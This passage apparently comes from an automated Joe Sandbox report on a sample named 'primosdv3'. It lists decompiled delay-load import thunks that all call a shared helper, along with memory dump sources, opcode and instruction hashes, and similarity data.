Function 00C7E20A Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E20A() {

				E00C7E85D(0xc9c5ec, 0xcc3154); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: df3c7df7e48467b5570d159a483b3855add9baae345ec3030f4746c168fc8914
Instruction ID: cd4f2377916bf8ab1c958a78c20540296b81f1ad52f479fa54a2e664ec1bf979
Opcode Fuzzy Hash: df3c7df7e48467b5570d159a483b3855add9baae345ec3030f4746c168fc8914
Instruction Fuzzy Hash: 87B092D2258040BD2A04920A6907E3A010CC188B10320C07EF819C1181985069092432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E21E Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E21E() {

				E00C7E85D(0xc9c5ec, 0xcc314c); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d044960e7022753e205c8471a6410d0d164bf78867ade6e1695a9a1bf03d6481
Instruction ID: 2c531f105328d42a488adabcfe68020ebe457de1a80c0ca7a70ad9ce8c653f30
Opcode Fuzzy Hash: d044960e7022753e205c8471a6410d0d164bf78867ade6e1695a9a1bf03d6481
Instruction Fuzzy Hash: 08B092E3258040BD2A04A10A6807E3A010CC189B10320C07EF81AC14819840A9002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E228 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E228() {

				E00C7E85D(0xc9c5ec, 0xcc3148); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3c09248b383b1c03cf22e38ddf3fe42511f3bbbc703c34eadf250112b7cf50c5
Instruction ID: fa093381982ab48cab8d1e34548d570a56d17718bb111fff617776478dcbff03
Opcode Fuzzy Hash: 3c09248b383b1c03cf22e38ddf3fe42511f3bbbc703c34eadf250112b7cf50c5
Instruction Fuzzy Hash: 73B012E325C140BD3B44D10A6C07E3F010CC1C8F10330C17EF81EC14C1D8406D402432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E232 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E232() {

				E00C7E85D(0xc9c5ec, 0xcc3144); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9a6cceeb7d6cba124447409f34f5b28cbb185af73d365621e968278508c407a4
Instruction ID: cbea0005fede783fca53bb7f2b05167ba1609f48f7b6bb07f286e77e82e20ee3
Opcode Fuzzy Hash: 9a6cceeb7d6cba124447409f34f5b28cbb185af73d365621e968278508c407a4
Instruction Fuzzy Hash: EAB092E2258040BD2A04910A6907E3A010CC188B10320C07EF81AC1481D8406A012432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E23C Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E23C() {

				E00C7E85D(0xc9c5ec, 0xcc3140); // executed
				goto __eax;
			}

0x00c7e1e3
0x00c7e1ea

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd6c242b4344e971c7a3c7988fb371462a1d6a2f5827b0650a60e933ae2a31f2
Instruction ID: e033327396a2df242ff6f3436407b7616eb5ecafa38970d64a1702d29a5cb40d
Opcode Fuzzy Hash: bd6c242b4344e971c7a3c7988fb371462a1d6a2f5827b0650a60e933ae2a31f2
Instruction Fuzzy Hash: 75B092E2258040BD3A04910A6807E3A010CC188B10320C07EF81AC1481984069002432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E44B Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E44B() {

				E00C7E85D(0xc9c60c, 0xcc305c); // executed
				goto __eax;
			}

0x00c7e3fc
0x00c7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1fded111f5832f0e24f750e2f4a58368ca9ed7bd1e45e25d5ca20d4077d3e07b
Instruction ID: 6fd29e3c77fb0d57efff6734e00670ba122a69766e20e1b99f8504a04ad53846
Opcode Fuzzy Hash: 1fded111f5832f0e24f750e2f4a58368ca9ed7bd1e45e25d5ca20d4077d3e07b
Instruction Fuzzy Hash: EFB012E3258040FC3704E10A6C06E37021CC1C8B10330C07FF81CC10C0D8404C041433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E419 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E419() {

				E00C7E85D(0xc9c60c, 0xcc3054); // executed
				goto __eax;
			}

0x00c7e3fc
0x00c7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9af98e9b345b44d1de498a89aa7734566288d1b2a29fc49ce85b6290f4ebfbb0
Instruction ID: cb5d523db2aea6c132bced6399543f45a6eb2dfecd49d7ed9b3d5ea8c341700b
Opcode Fuzzy Hash: 9af98e9b345b44d1de498a89aa7734566288d1b2a29fc49ce85b6290f4ebfbb0
Instruction Fuzzy Hash: 9DB012E3258040BC3704910A6D06E37021CC1C8B10330C07EF51CC10C0D8400C092433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E423 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E423() {

				E00C7E85D(0xc9c60c, 0xcc304c); // executed
				goto __eax;
			}

0x00c7e3fc
0x00c7e403

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E3FC

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bf01b551a00b29ea371790342d766aeef388cb15ceaed9bfe66e3ad9e42606d2
Instruction ID: cb1f01bbc21e455c312364237675e7cb8ab303dca9d3f5b5577f4dd91e5af7c6
Opcode Fuzzy Hash: bf01b551a00b29ea371790342d766aeef388cb15ceaed9bfe66e3ad9e42606d2
Instruction Fuzzy Hash: 6EB012F3258040FC3704E10A6C06E37021CC1C8F10330C07EF81CC14C0D8404E001433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E593 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E593() {

				E00C7E85D(0xc9c68c, 0xcc3180); // executed
				goto __eax;
			}

0x00c7e580
0x00c7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b882a2cfe648e1eba1cf6c3f18a87e9c7ba62a1119d9a6ec487347c9badaed48
Instruction ID: 111a2936c557571952f65fb8e3a9ceb3f84abaa618bfeed0ce967655aa3f9f1d
Opcode Fuzzy Hash: b882a2cfe648e1eba1cf6c3f18a87e9c7ba62a1119d9a6ec487347c9badaed48
Instruction Fuzzy Hash: 7DB012C32580447D3644916A6C46E7B012CC1C8B14331C0BEF81CC50C0E8400C001433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5A7 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E5A7() {

				E00C7E85D(0xc9c68c, 0xcc3174); // executed
				goto __eax;
			}

0x00c7e580
0x00c7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b5778b0f8d4cf65958e9463859722f205aede210687d4f44f20526a604fdcf0f
Instruction ID: 95f19c49d7a4d4b8c39b92e68b0ea7740f47eb4ef18dc928f0e84bf913c60b45
Opcode Fuzzy Hash: b5778b0f8d4cf65958e9463859722f205aede210687d4f44f20526a604fdcf0f
Instruction Fuzzy Hash: BBB012C32580407C3644916BAD4AE3B013CC1C9B14334C2BEF41CC50C0EC400D011432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5B1 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E5B1() {

				E00C7E85D(0xc9c68c, 0xcc3178); // executed
				goto __eax;
			}

0x00c7e580
0x00c7e587

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E580

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff2b8cdd5c6da74da1db5015f46be414e6a960739e4390ffd0853b819360622a
Instruction ID: 0940c2d592dcf7f40038d80230a4e6e7366e35ae73890f9664326acea7febf2f
Opcode Fuzzy Hash: ff2b8cdd5c6da74da1db5015f46be414e6a960739e4390ffd0853b819360622a
Instruction Fuzzy Hash: 2DB012C32581407C3684916AAC4BE3B013CC1C9B14334C2BEF41CC50C0E8400C401432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E546 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E546() {

				E00C7E85D(0xc9c66c, 0xcc3078); // executed
				goto __eax;
			}

0x00c7e51f
0x00c7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 033ec602613d3accbd42a1a6c8035042e7ee12e3f2525a6fcf3b7496b3db39c7
Instruction ID: 95cfc6cc663f14d8a99781191727f14ca873d30a8fd11f179caf61547e6b6347
Opcode Fuzzy Hash: 033ec602613d3accbd42a1a6c8035042e7ee12e3f2525a6fcf3b7496b3db39c7
Instruction Fuzzy Hash: 59B012C3258140BC3744510DAD0BE3B061CC1CAF14330C27EF41CC00C0E8400C441432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E50D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E50D() {

				E00C7E85D(0xc9c66c, 0xcc3090); // executed
				goto __eax;
			}

0x00c7e51f
0x00c7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3d08f2162ce5cd2c0cd6e5ca383176de65bc06ce3b26cea66c5ce15d835b2430
Instruction ID: b7b196bb623ca79561d3f099a5712f4308a79fa9cc255dc2a76d732c50ccb8ad
Opcode Fuzzy Hash: 3d08f2162ce5cd2c0cd6e5ca383176de65bc06ce3b26cea66c5ce15d835b2430
Instruction Fuzzy Hash: D9B012D3258140BC360411296D0AE3B021CC1C5F14330C07EF428C04C1A8410D041432

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E528 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E528() {

				E00C7E85D(0xc9c66c, 0xcc3084); // executed
				goto __eax;
			}

0x00c7e51f
0x00c7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37324a6ab280cf81aba10d06fb1fac4a120e5595838268552c9c5623b7519ced
Instruction ID: 418e198559aacf6ea4e3f0f8f1f72fb2ceb59070254ceacdf47d843b95056779
Opcode Fuzzy Hash: 37324a6ab280cf81aba10d06fb1fac4a120e5595838268552c9c5623b7519ced
Instruction Fuzzy Hash: DBB012C3258080BC3644510D6E06E3B071CC1C9F14330C07EF81CC00C0EC410C011433

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E532 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7E532() {

				E00C7E85D(0xc9c66c, 0xcc3080); // executed
				goto __eax;
			}

0x00c7e51f
0x00c7e526

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C7E51F

Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1

